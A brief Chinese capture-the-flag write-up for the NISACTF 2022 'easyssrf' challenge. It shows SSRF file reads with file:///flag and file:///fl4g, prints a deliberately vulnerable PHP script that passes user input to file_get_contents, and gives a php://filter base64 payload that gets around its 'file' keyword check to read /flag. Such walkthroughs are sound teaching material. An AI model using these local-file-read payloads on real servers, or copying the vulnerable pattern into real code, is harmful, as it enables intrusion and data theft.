NSS [NISACTF 2022]easyssrf

编程入门 行业动态 更新时间:2024-10-28 06:29:00

<a href=https://www.elefans.com/category/jswz/34/1658945.html style=NSS [NISACTF 2022]easyssrf"/>

NSS [NISACTF 2022]easyssrf

NSS [NISACTF 2022]easyssrf

先看题目,给了一个输入框

看这提示就知道不是curl了,先file协议读一下flag,file:///flag

不能直接读flag,读个提示文件file:///fl4g

访问一下

<?phphighlight_file(__FILE__);
error_reporting(0);$file = $_GET["file"];
if (stristr($file, "file")){die("你败了.");
}//flag in /flag
echo file_get_contents($file);

stristr()函数:查找第二个参数在 第一个参数 中的第一次出现,并返回字符串的剩余部分。

这里如果不触发if,那么我传入的file参数就不能有file字符串。

传入php://filter/read=convert.base64-encode/resource=/flag,伪协议读一下

解码得flag

更多推荐

NSS [NISACTF 2022]easyssrf

本文发布于:2023-12-05 18:01:26,感谢您对本站的认可!
本文链接:https://www.elefans.com/category/jswz/34/1664902.html
版权声明:本站内容均来自互联网,仅供演示用,请勿用于商业和其他非法用途。如果侵犯了您的权益请与我们联系,我们将在24小时内删除。
本文标签:NISACTF   NSS   easyssrf

发布评论

评论列表 (有 0 条评论)
草根站长

>www.elefans.com

编程频道|电子爱好者 - 技术资讯及电子产品介绍!